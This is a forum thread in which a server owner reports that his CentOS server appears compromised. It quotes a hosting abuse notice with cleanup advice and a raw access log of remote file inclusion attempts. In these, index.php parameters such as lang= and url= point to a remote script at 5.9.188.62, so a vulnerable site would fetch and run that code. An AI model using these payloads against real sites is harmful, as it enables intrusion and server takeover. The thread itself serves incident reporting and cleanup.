Need some help quick please

RadMan

Verified User
Joined
Apr 12, 2007
Messages
209
Location
Canada
I think my server has been hacked and it's attacking other servers..

I thought my colo was off the his rocker when he first complained to me yesterday.. Today he got another notification from a different source...

Need an experienced Linux/CentOS server admin to check out my server and correct any issues he/she may find..
======================

NOTES:



This type of attack typically mean the server for which the IP address

of the attacker is bound is a compromised server.



Please check the server behind the IP address above for suspicious

files in /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox,

/var/spool/squid, and /var/spool/cron Please use "ls -lab" for

checking directories as sometimes compromised servers will have hidden

files that a regular "ls" will not show.



Please also check the process tree (ps -efl or ps -auwx) for

suspicious processes; often times the malware / hack pretends to be an

Apache process.



Linux Malware Detect is an excellent program for finding malware on a

server. You can find the latest version at

http://www.rfxn.com/projects/linux-malware-detect/



Clam Anti-virus, clamscan, can also be used to find commonly used PHP

and Perl-based hacks, including various php shells, on a server using

the “--infected” and “--recursive” options.



You may also want to check out using root kit detection tools -

http://www.chkrootkit.org/, http://www.rootkit.nl/, and

http://www.ossec.net/en/rootcheck.html as tools which should be used

in addition to checking the directories and process tree.



### EOF NOTES ###



Please take appropriate action to stop these attacks from happening.



Thank you very much for your time.


Code:
Type of attack:

 

Sample log report including date and time stamp (1st field is the word

"request", 2nd field is the IP address or the domain name being

attacked, and the 3rd field is the IP address or domain name of the

attacker):

 

  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:36 +0000]

"GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-doFQz7pAAADzVrsk "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:48 +0000]

"GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-drFQz7pAAAF0ChVY "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:59 +0000]

"GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"

"-" UK-dt1Qz7pAAADzLoi8 "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:10 +0000]

"GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-dwlQz7pAAADzInIY "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:21 +0000]

"GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-dzVQz7pAAADzFmuE "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:32 +0000]

"GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"

"-" UK-d2FQz7pAAAF1no7s "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:43 +0000]

"GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"

"-" UK-d41Qz7pAAADzdvYM "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:54 +0000]

"GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-"

"-" UK-d7lQz7pAAADywcZ0 "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:05 +0000]

"GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-d@VQz7pAAADy9lTA "-"

 Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:16 +0000]

"GET /index.php?open=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518

"-" "-" UK-eBFQz7pAAADzfwII "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:58:53 +0000] "GET

/index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jjVQz7pAAAGMpHwk "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:58:53

+0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jjVQz7pAAAGM3K@A "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:59:05 +0000] "GET

/index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jmVQz7pAAABz8XSc "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:06

+0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jmlQz7pAAABx2DqI "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:59:17 +0000] "GET

/index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jpVQz7pAAAGMpHww "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:17

+0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jpVQz7pAAABx8GVM "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:59:29 +0000] "GET

/index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jsVQz7pAAADzPqGw "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:29

+0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jsVQz7pAAADzSqfc "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:59:40 +0000] "GET

/index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jvFQz7pAAABx4Ebg "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:40

+0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jvFQz7pAAAByOINM "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:20:59:51 +0000] "GET

/index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-jx1Qz7pAAABx2Dqw "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:51

+0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-jx1Qz7pAAAGMrI-U "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:21:00:03 +0000] "GET

/index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-j01Qz7pAAAGMrI-c "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:03

+0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-j01Qz7pAAAGMpHxM "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:21:00:15 +0000] "GET

/index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-j31Qz7pAAAGMpHxU "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:15

+0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-j31Qz7pAAABx2DrI "-"

 Request: thelimousinecompany.ie 204.15.197.36 - -

[23/Nov/2012:21:00:27 +0000] "GET

/index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-"

UK-j61Qz7pAAADzKodQ "-"

 Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:28

+0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500

3506 "-" "-" UK-j7FQz7pAAADzFm8I "-"

TIA

Ed
 
Last edited:
Hi,

im avaible to this kind of service. Feel free to PM me or send me an email (my mail in signature) for a quote.

Regards
 
Hi John.. Scott is still running a scan to source it...

Server has now been updated with the latest versions of pretty well everything including csf v5.71...

It's been running without interruption for almost 700 days.. I'm counting myself lucky :)

Thanks for asking :)

Ed
 
Updating the server seems to have corrected the issues.. No more complaints now.. Not sure what the source of entry was.. :(
 
please help me

please help me

hello.
I delete all folder and files in my control panel
how can repair my site I havnot any back up.
how can I reset my hosting?
please
 
Hello,

You might want to send me a PM (in English), or a letter in a Russian language through my web-site (see my signature lines).
 
Back
Top